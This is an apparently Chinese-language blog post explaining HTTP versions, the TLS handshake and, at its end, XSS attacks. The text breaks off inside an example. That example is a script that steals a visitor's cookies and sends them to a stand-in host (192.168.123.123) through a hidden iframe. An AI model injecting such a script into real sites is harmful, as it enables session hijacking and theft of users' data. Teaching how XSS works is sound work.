<!DOCTYPE html>
<html lang="zh-CN,en,default">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Noto Serif SC:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">
<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"wizard-guido.github.io","root":"/","scheme":"Pisces","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"gitalk","storage":true,"lazyload":false,"nav":null,"activeClass":"gitalk"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="本篇文章主要针对常见的一些计算机网络概念进行梳理和总结，便于今后对于web开发的深入理解。">
<meta property="og:type" content="article">
<meta property="og:title" content="HTTP&amp;网络安全篇">
<meta property="og:url" content="https://wizard-guido.github.io/2021/12/06/HTTP&Network/index.html">
<meta property="og:site_name" content="二进制的流浪">
<meta property="og:description" content="本篇文章主要针对常见的一些计算机网络概念进行梳理和总结，便于今后对于web开发的深入理解。">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2021-12-06T00:00:00.000Z">
<meta property="article:modified_time" content="2022-02-22T22:51:13.057Z">
<meta property="article:author" content="Will">
<meta property="article:tag" content="HTTP">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://wizard-guido.github.io/2021/12/06/HTTP&Network/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>


<script type="text/javascript">
  // Wait for the page to load first
  var _prevOnload = window.onload;
  window.onload = function() {
      var switchLang = document.getElementsByClassName("menu-item menu-item-switch_lang")[0];
      switchLang.onclick = function() {
          var href = window.location.href;
          var indexOfEn = href.toLowerCase().indexOf('/en/');
          if(indexOfEn !== -1) {
              window.location.href = href.replace('/en/', '/');
          }
          else {
              window.location.href = href.replace('.io', '.io/en');
          }
          if(typeof(_prevOnload) === 'function') {
              _prevOnload();
          }
          return false;
      }
  }
</script>
  <title>HTTP&网络安全篇 | 二进制的流浪</title>
  
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-HEB2EZELMD"></script>
    <script>
      if (CONFIG.hostname === location.hostname) {
        window.dataLayer = window.dataLayer || [];
        function gtag(){dataLayer.push(arguments);}
        gtag('js', new Date());
        gtag('config', 'G-HEB2EZELMD');
      }
    </script>






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">二进制的流浪</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-switch_lang">

    <a href="https://wizard-guido.github.io/en/" rel="section"><i class="fa fa-language fa-fw"></i>English</a>

  </li>
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-健身">

    <a href="/training/" rel="section"><i class="fa fa-dumbbell fa-fw"></i>健身</a>

  </li>
        <li class="menu-item menu-item-摄影">

    <a href="/photography/" rel="section"><i class="fas fa-camera fa-fw"></i>摄影</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://wizard-guido.github.io/2021/12/06/HTTP&Network/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="Will">
      <meta itemprop="description" content="心有猛虎，细嗅蔷薇">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="二进制的流浪">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          HTTP&网络安全篇
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-12-06 00:00:00" itemprop="dateCreated datePublished" datetime="2021-12-06T00:00:00+00:00">2021-12-06</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2022-02-22 22:51:13" itemprop="dateModified" datetime="2022-02-22T22:51:13+00:00">2022-02-22</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Network/" itemprop="url" rel="index"><span itemprop="name">Network</span></a>
                </span>
            </span>

          <br>
            <span class="post-meta-item" title="本文字数">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
                <span class="post-meta-item-text">本文字数：</span>
              <span>7.4k</span>
            </span>
            <span class="post-meta-item" title="阅读时长">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
                <span class="post-meta-item-text">阅读时长 &asymp;</span>
              <span>7 分钟</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><strong>本篇文章主要针对常见的一些计算机网络概念进行梳理和总结，便于今后对于web开发的深入理解。</strong></p>
<a id="more"></a>

<h1 id="Network"><a href="#Network" class="headerlink" title="Network"></a>Network</h1><h2 id="HTTP协议篇"><a href="#HTTP协议篇" class="headerlink" title="HTTP协议篇"></a>HTTP协议篇</h2><h3 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h3><p>HTTP是基于TCP/IP协议的<strong>应用层协议</strong>。它不涉及数据报传输，主要规定了客服端与服务器的通信格式，默认使用80端口。</p>
<h3 id="HTTP-1-0"><a href="#HTTP-1-0" class="headerlink" title="HTTP/1.0"></a>HTTP/1.0</h3><h4 id="简介-1"><a href="#简介-1" class="headerlink" title="简介"></a>简介</h4><ul>
<li><p>1996年——发布</p>
</li>
<li><p>1.0版本较0.9版本中只有GET命令的情况，还引入了POST和HEAD命令。</p>
</li>
<li><p>HTTP请求和回应格式，除了包括<strong>数据部分</strong>还必须包括<strong>头信息即HTTP HEADER</strong>（用来描述元数据）</p>
</li>
</ul>
<h4 id="请求格式"><a href="#请求格式" class="headerlink" title="请求格式"></a>请求格式</h4><p>请求命令+多行头信息</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">GET &#x2F; HTTP&#x2F;1.0 请求命令</span><br><span class="line">User-Agent: Mozilla&#x2F;5.0 (Macintosh; Intel Mac OS X 10_10_5) 多行头信息</span><br><span class="line">Accept: *&#x2F;* 多行头信息</span><br></pre></td></tr></table></figure>
<h4 id="回应格式"><a href="#回应格式" class="headerlink" title="回应格式"></a>回应格式</h4><p>头信息+空行+数据。第一行为协议版本+状态码+状态描述</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">HTTP&#x2F;1.0 200 OK 第一行</span><br><span class="line">Content-Type: text&#x2F;plain  从这儿开始是头信息</span><br><span class="line">Content-Length: 137582</span><br><span class="line">Expires: Thu, 05 Dec 1997 16:00:00 GMT</span><br><span class="line">Last-Modified: Wed, 5 August 1996 15:55:28 GMT</span><br><span class="line">Server: Apache 0.84</span><br><span class="line">        											这个是空行</span><br><span class="line">&lt;html&gt;												从这儿开始是数据</span><br><span class="line">  &lt;body&gt;Hello World&lt;&#x2F;body&gt;</span><br><span class="line">&lt;&#x2F;html&gt;</span><br></pre></td></tr></table></figure>
<h4 id="Content-Type-字段"><a href="#Content-Type-字段" class="headerlink" title="Content-Type 字段"></a>Content-Type 字段</h4><p>头信息为ASCII码，但数据可以为任意格式。因此需要用**<code>Content-Type</code>告诉客户端该数据的格式**。</p>
<p>常见的<code>Content-Type</code>字段值如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">text&#x2F;plain</span><br><span class="line">text&#x2F;html</span><br><span class="line">text&#x2F;css</span><br><span class="line">image&#x2F;jpeg</span><br><span class="line">image&#x2F;png</span><br><span class="line">image&#x2F;svg+xml</span><br><span class="line">audio&#x2F;mp4</span><br><span class="line">video&#x2F;mp4</span><br><span class="line">application&#x2F;javascript</span><br><span class="line">application&#x2F;pdf</span><br><span class="line">application&#x2F;zip</span><br><span class="line">application&#x2F;atom+xml</span><br></pre></td></tr></table></figure>
<p>这些数据类型统称为 <strong>MIME type</strong>，格式为：一级类型/二级类型。</p>
<h4 id="Content-Encoding-字段"><a href="#Content-Encoding-字段" class="headerlink" title="Content-Encoding 字段"></a>Content-Encoding 字段</h4><p>由于<strong>发送的数据可以为任意格式</strong>，因此可以把数据压缩后再发送。**<code>Content-Encoding</code>字段说明数据的压缩方式**。常见压缩方法：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">Content-Encoding: gzip</span><br><span class="line">Content-Encoding: compress</span><br><span class="line">Content-Encoding: deflate</span><br></pre></td></tr></table></figure>
<p>同时<strong>客户端在请求时</strong>，可以说明自己所<strong>接受的压缩方式</strong>，使用**字段<code>Accept-Encoding</code>**。如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Accept-Encoding: gzip, deflate</span><br></pre></td></tr></table></figure>
<h4 id="缺点"><a href="#缺点" class="headerlink" title="缺点"></a>缺点</h4><p>HTTP/1.0 主要问题是：<strong>每个TCP连接只能发送一个请求</strong>。数据发送完毕，链接就关闭了。再请求其它资源，就必须再新建一个TCP连接。而TCP连接需要客户端与服务器三次握手，并且开始时由于slow start，速度很慢，因此新建TCP连接成本很高。</p>
<p><strong>为了解决这个问题，部分浏览器使用了非标准字段<code>Connection</code>。</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Connection: keep-alive</span><br></pre></td></tr></table></figure>
<p>上面这个字段要求服务器不要关闭TCP连接，以便其它请求复用，该可复用的TCP连接直到客户端或服务器主动关闭，才会断开。但这种方法并不标准。</p>
<h3 id="HTTP-1-1"><a href="#HTTP-1-1" class="headerlink" title="HTTP/1.1"></a>HTTP/1.1</h3><p>从1997沿用至201几，直到HTTPS。</p>
<h4 id="持久连接"><a href="#持久连接" class="headerlink" title="持久连接"></a>持久连接</h4><ul>
<li>1.1版本<strong>最大的变化</strong>就是引入了<strong>持久连接（persistent connection）</strong>，即TCP连接默认不关闭，可以被多个请求复用，并且不用声明<code>Connection:keep-alive</code>。</li>
<li>客户端与服务器之间一段时间没有通信，就会主动关闭连接。但规范做法是，客户端在最后一个请求时，发送<code>Connection: close</code>，明确要求服务器关闭TCP连接。</li>
</ul>
<p><strong>注：</strong>对于同一个域名，大多数浏览器允许同时建立<strong>6个持久连接</strong>。</p>
<h4 id="管道机制"><a href="#管道机制" class="headerlink" title="管道机制"></a>管道机制</h4><p>在1.0版本中，在同一个TCP连接里，如果客户端要<strong>请求两个资源</strong>，会<strong>先发送A请求</strong>，然后等待服务器回应，<strong>收到响应</strong>之后<strong>再发送B请求</strong>。</p>
<p>在1.1版本中引入了<strong>管道机制（pipelining）</strong>，其允许浏览器<strong>同时发送A请求和B请求</strong>，但服务器还是按照顺序，先回应A请求，完成之后再回应B请求。</p>
<p>因此，管道机制使<strong>客户端可以在同一个TCP连接中同时发送多个请求</strong>。</p>
<h4 id="Content-Length-字段"><a href="#Content-Length-字段" class="headerlink" title="Content-Length 字段"></a>Content-Length 字段</h4><p><strong>用于声明本次回应的数据长度。</strong></p>
<h4 id="分块传输编码"><a href="#分块传输编码" class="headerlink" title="分块传输编码"></a>分块传输编码</h4><p>简言之，就是服务器<strong>产生一块数据就发送一块</strong>，即采用流模式（stream）取代缓存模式（buffer）。</p>
<p>因此，1.1版本可以不使用<code>Content-Length</code>字段，而使用分块传输编码（chunked transfer encoding）。只要<strong>请求或回应的头信息中有<code>Transfer-Encoding</code>字段</strong>，就表明回应将由数量未定的数据块组成。</p>
<p><strong>注：</strong>每个非空的数据块之前，会有一个16进制的数值来表示这个块的长度。最后是一个大小为0的块，表示本次回应的数据发送完毕。示例如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">HTTP&#x2F;1.1 200 OK</span><br><span class="line">Content-Type: text&#x2F;plain</span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line"></span><br><span class="line">25</span><br><span class="line">This is the data in the first chunk</span><br><span class="line"></span><br><span class="line">1C</span><br><span class="line">and this is the second one</span><br><span class="line"></span><br><span class="line">3</span><br><span class="line">con</span><br><span class="line"></span><br><span class="line">8</span><br><span class="line">sequence</span><br><span class="line"></span><br><span class="line">0</span><br></pre></td></tr></table></figure>
<h4 id="其它功能"><a href="#其它功能" class="headerlink" title="其它功能"></a>其它功能</h4><ul>
<li>1.1版本还新增了许多动词方法，如：<code>PUT</code>, <code>PATCH</code>, <code>HEAD</code>, <code>OPTIONS</code>, <code>DELETE</code></li>
<li>客户端请求头信息<strong>新增了<code>HOST</code>字段</strong>，用来指定服务器的域名。有了<code>HOST</code>字段就可以将请求发往同一服务器上的不同网站。（为虚拟机兴起打下基础）</li>
</ul>
<h4 id="缺点-1"><a href="#缺点-1" class="headerlink" title="缺点"></a>缺点</h4><p>存在<strong>队头堵塞（Head-of-line blocking）</strong>。尽管允许复用TCP连接，但在<strong>同一个TCP连接里，数据通信依然是按次序进行</strong>，服务器只有处理完第一个请求的回应，才能进行下一个请求的回应。如果前一个请求的回应很慢，那么后面就会有许多请求排队。</p>
<p>避免队头堵塞的方法有：</p>
<pre><code>1. **减少请求次数**。例如：合并脚本和样式表、将图片嵌入CSS代码
1. **同时多开持久连接**。例如：域名分片（domain sharding）即所需下载可以来自多个域，可以解决并发限制。
</code></pre>
<h3 id="HTTP-2"><a href="#HTTP-2" class="headerlink" title="HTTP/2"></a>HTTP/2</h3><h4 id="二进制协议"><a href="#二进制协议" class="headerlink" title="二进制协议"></a>二进制协议</h4><p>HTTP/1.1版本的头信息是文本（ASCII码），数据体是文本或二进制。但HTTP/2则是一个<strong>彻底的二进制协议</strong>，头信息和数据体都是二进制，并且统称为“帧”（frame）：头信息帧和数据帧。</p>
<p>二进制协议的好处是：可以定义额外的帧。</p>
<h4 id="多工-Multiplexing"><a href="#多工-Multiplexing" class="headerlink" title="多工 Multiplexing"></a>多工 Multiplexing</h4><p>在HTTP/2中，在同一个TCP连接中，客户端和浏览器都可以同时发送多个请求和响应，并且不用按照顺序一一对应，这就避免了队头堵塞的问题。</p>
<p>例如：在一个TCP连接中，服务器同时收到A请求和B请求，于是先回应A请求，结果发现处理十分耗时，于是就发送A请求已处理好的部分，接着处理回应B请求，完成之后，再处理发送A请求的剩下的部分。我们称这种<strong>双工的、实时的通信</strong>为<strong>多工</strong>。</p>
<h4 id="数据流"><a href="#数据流" class="headerlink" title="数据流"></a>数据流</h4><p>HTTP/2的<strong>数据包是不按顺序发送的</strong>，同一个连接里面连续的数据包，可能属于不同的回应，因此需要<strong>对数据包进行标记</strong>，指出它属于哪个回应。</p>
<p>HTTP/2将<strong>每个请求或者回应的所有数据包</strong>都称为一个<strong>数据流（stream）</strong>。每个数据流都有一个唯一的编号。数据包发送的时候，必须标记数据流ID，一标识它属于哪个数据流。此外客户端发出的数据流ID一律为奇数，服务端发出的数据流ID一律为偶数。</p>
<p>数据流发送到一半时，客户端和服务器都可以发出信号来取消这个数据流。在HTTP/1.1版本中，取消数据流发送的唯一方法是关闭TCP连接。HTTP/2可以取消某一次请求同时保证TCP连接还是开启的状态，可以被其它请求复用。</p>
<p>客户端还可以指定数据流的优先级，优先级越高，服务器会越早对其回应。</p>
<h4 id="头信息压缩"><a href="#头信息压缩" class="headerlink" title="头信息压缩"></a>头信息压缩</h4><p>由于每次请求，很多<strong>请求头信息中的字段都是重复的</strong>（如Cookie、User Agent等），这会造成很多带宽的浪费。HTTP/2优化了这一点，引入<strong>头信息压缩机制</strong>。一方面，头信息<strong>使用<code>gzip</code><strong>等方法压缩后再发送；另一方面，客户端和服务端维护一张</strong>头信息表</strong>，该表为<strong>字段和索引号的映射</strong>，之后就只发送索引号，以提高速度。</p>
<h4 id="服务器推送"><a href="#服务器推送" class="headerlink" title="服务器推送"></a>服务器推送</h4><p>HTTP/2允许服务器未收到请求，主动向客户端发送资源。</p>
<p>例如：客户端请求一个包含很多静态资源的网页，服务器会主动把这些静态资源随网页一起发送给客户端，这样就不需要等客户端收到网页后解析HTML发现有静态资源再请求静态资源了。</p>
<h2 id="HTTPS——番外篇"><a href="#HTTPS——番外篇" class="headerlink" title="HTTPS——番外篇"></a>HTTPS——番外篇</h2><p>互联网的通信安全是建立在<strong>SSL/TLS</strong>协议之上的。</p>
<p><strong>注</strong>：SSL——<strong>Secure Sockets Layer</strong>, TLS——SSL的升级</p>
<h3 id="使用HTTPS的原因-amp-作用"><a href="#使用HTTPS的原因-amp-作用" class="headerlink" title="使用HTTPS的原因&amp;作用"></a>使用HTTPS的原因&amp;作用</h3><p><strong>对比：</strong></p>
<ul>
<li><p>HTTP不使用SSL/TLS，因此是不加密的通信，所有信息都是明文传播</p>
<ol>
<li><strong>窃听风险（eavesdropping）：</strong>第三方可以截获并获知通信内容</li>
<li><strong>篡改风险（tampering）：</strong>第三方可以截获并修改通信内容</li>
<li><strong>冒充风险（pretending）：</strong>第三方可以冒充他人身份参与通信</li>
</ol>
</li>
<li><p>基于SSL/TLS协议的HTTPS的好处</p>
<ol>
<li><strong>所有信息都是加密传输</strong>——无法被窃听</li>
<li><strong>具有校验机制</strong>——通信内容一旦被篡改，通信双方都能发现</li>
<li><strong>配备身份证书</strong>——防止身份冒充</li>
</ol>
</li>
</ul>
<h3 id="SSL-TLS协议的基本运行过程"><a href="#SSL-TLS协议的基本运行过程" class="headerlink" title="SSL/TLS协议的基本运行过程"></a>SSL/TLS协议的基本运行过程</h3><p>该协议的基本思路为：<strong>非对称加密：公钥加密，私钥解密</strong>。即客户端先向服务端索要公钥，然后再用公钥加密信息，服务器收到密文后，用自己的私钥解密。</p>
<ol>
<li><p><strong>保证公钥不被篡改的方法</strong></p>
<p>答：将<strong>公钥放入数字证书</strong>中，只要证书是可信的，那么公钥就是可信的。</p>
</li>
<li><p><strong>用公钥加密计算量太大，需要减少耗用时间的方法</strong></p>
<p>答：每一次对话（session），客户端和服务端会生成一个“对话密钥”（session key），用它来加密信息。由于“对话密钥”是对称加密，因此运算速度非常快，因此如果服务器公钥只用于加密“对话密钥”本身的话，就会大大减少加密运算的消耗时间。</p>
</li>
</ol>
<p>所以，SSL/TLS协议的基本过程是：</p>
<ol>
<li>客户端向服务端<strong>索要并验证公钥</strong> —— 握手阶段</li>
<li>双方协商<strong>生成“对话密钥”</strong>              —— 握手阶段</li>
<li>双方采用“对话密钥”<strong>进行加密通信</strong></li>
</ol>
<h3 id="握手阶段"><a href="#握手阶段" class="headerlink" title="握手阶段"></a>握手阶段</h3><p>握手阶段涉及四次通信，该阶段的所有通信都是明文的。</p>
<h4 id="阶段一：客户端发出请求"><a href="#阶段一：客户端发出请求" class="headerlink" title="阶段一：客户端发出请求"></a>阶段一：客户端发出请求</h4><p>首先，客户端向服务器发送加密通信请求。其发送的请求内容主要有以下：</p>
<ol>
<li>支持的协议版本，例如：TLS 1.0</li>
<li>客户端生成的随机数，用于稍后生成“对话密钥”</li>
<li>支持的加密方法，例如：RSA公钥加密</li>
<li>支持的压缩方法</li>
</ol>
<h4 id="阶段二：服务器回应"><a href="#阶段二：服务器回应" class="headerlink" title="阶段二：服务器回应"></a>阶段二：服务器回应</h4><p>服务器收到客户端请求后，向客户端发出响应。响应内容主要包括以下：</p>
<ol>
<li>确认使用的加密通信协议版本。如果双方支持的版本不一致，则服务器会关闭本次加密通信</li>
<li>服务器生成的随机数，用于稍后生成“对话密钥”</li>
<li>确认使用的加密方法</li>
<li>服务器证书</li>
</ol>
<h4 id="阶段三：客户端回应"><a href="#阶段三：客户端回应" class="headerlink" title="阶段三：客户端回应"></a>阶段三：客户端回应</h4><p>客户端收到服务器的响应后，首先要验证服务器的数字证书。</p>
<p>如果<strong>1. 证书不可信。2. 证书中的域名与实际域名不一致。3. 证书已经过期</strong>，就会向访问者显示一个警告，让其选择是否继续通信。</p>
<p>如果证书没有问题，客户端会<strong>从证书中取出服务器的公钥</strong>，然后向服务器发送响应，其内容主要如下：</p>
<ol>
<li>客户端生成的随机数。该随机数用公钥加密，防止被窃听。</li>
<li>编码改变通知。表示随后的信息将用双方商定的加密方法和密钥发送。</li>
<li>客户端握手结束通知。表示客户端的握手阶段结束，这一项也是前面发送的所有内容的hash值，用来供服务器校验。</li>
</ol>
<p><strong>注：</strong>这个阶段生成的随机数是整个握手阶段出现的第三个随机数（”pre-master key”）。有了它之后，客户端和服务器就都同时有了三个随机数，然后双方用事先商定的加密方法，各自生成本次会话所用的同一把“会话密钥”。</p>
<h4 id="阶段四：服务器最后回应"><a href="#阶段四：服务器最后回应" class="headerlink" title="阶段四：服务器最后回应"></a>阶段四：服务器最后回应</h4><p>服务器收到第三个随机数之后，会计算生成本次会话所用的“会话密钥”。然后向客户端发送最后响应。其内容主要如下：</p>
<ol>
<li>编码改变通知。表示随后的信息将用双方商定的加密方法和密钥发送。</li>
<li>服务器握手结束通知。表示服务器的握手阶段已经结束。这一项同时也是前面发送的所有内容的hash值，用来供客户端校验。</li>
</ol>
<p>至此，整个握手阶段全部结束。接下来就是，客户端与服务器进行加密通信，这就完全是<strong>使用普通的HTTP协议</strong>了，只不过所<strong>发送的内容都使用“会话密钥”进行了加密</strong>。</p>
<h2 id="网络安全篇"><a href="#网络安全篇" class="headerlink" title="网络安全篇"></a>网络安全篇</h2><h3 id="XSS——跨站脚本"><a href="#XSS——跨站脚本" class="headerlink" title="XSS——跨站脚本"></a>XSS——跨站脚本</h3><h4 id="介绍"><a href="#介绍" class="headerlink" title="介绍"></a>介绍</h4><p>XSS，全称为<strong>Cross-site scripting</strong>，中文名称为跨站脚本，是一种<strong>对网络应用程序的安全漏洞的攻击</strong>，即是一种<strong>代码注入</strong>。这类攻击通常包含了HTML和用户脚本语言（主要为JavaScript）。</p>
<p>例如，用JavaScript在网站论坛上发布一段恶意的JavaScript代码，这就是脚本注入，而同时如果这个代码内容有请求外部服务器的功能，那么就叫做XSS。</p>
<p>因此，可以理解为<strong>XSS（跨站脚本）= 脚本注入 + 请求外部服务器的功能</strong>。</p>
<h4 id="示例"><a href="#示例" class="headerlink" title="示例"></a>示例</h4><p>例如，在某论坛网站中的发帖内容写下如下代码：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="javascript">  <span class="keyword">while</span> (<span class="literal">true</span>) &#123;</span></span><br><span class="line"><span class="javascript">    alert(<span class="string">&#x27;一直弹窗&#x27;</span>)</span></span><br><span class="line">  &#125;</span><br><span class="line"><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>假设该论坛网站没有任何过滤及其它防御机制的情况下，任何访问这个帖子的用户，都会在客户端界面一直弹出这个弹窗。</p>
<p><strong>这就是最简单的脚本注入。</strong>当然这个脚本并没有什么实质性的危害，那么XSS就是基于脚本注入的方法来完成，但它注入的是含有请求跨站功能的脚本。</p>
<p>例如，在上面提到的论坛网站中，注入如下代码：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="javascript">  (<span class="function"><span class="keyword">function</span>(<span class="params"><span class="built_in">window</span>, <span class="built_in">document</span></span>) </span>&#123;</span></span><br><span class="line"><span class="javascript">    <span class="comment">// 构造泄露信息用的 URL</span></span></span><br><span class="line"><span class="javascript">    <span class="keyword">var</span> cookies = <span class="built_in">document</span>.cookie;</span></span><br><span class="line"><span class="javascript">    <span class="keyword">var</span> xssURIBase = <span class="string">&quot;http://192.168.123.123/myxss/&quot;</span>;</span></span><br><span class="line"><span class="javascript">    <span class="keyword">var</span> xssURI = xssURIBase + <span class="built_in">window</span>.encodeURI(cookies);</span></span><br><span class="line"><span class="javascript">    <span class="comment">// 建立隐藏 iframe 用于通讯</span></span></span><br><span class="line"><span class="javascript">    <span class="keyword">var</span> hideFrame = <span class="built_in">document</span>.createElement(<span class="string">&quot;iframe&quot;</span>);</span></span><br><span class="line">    hideFrame.height = 0;</span><br><span class="line">    hideFrame.width = 0;</span><br><span class="line"><span class="javascript">    hideFrame.style.display = <span class="string">&quot;none&quot;</span>;</span></span><br><span class="line">    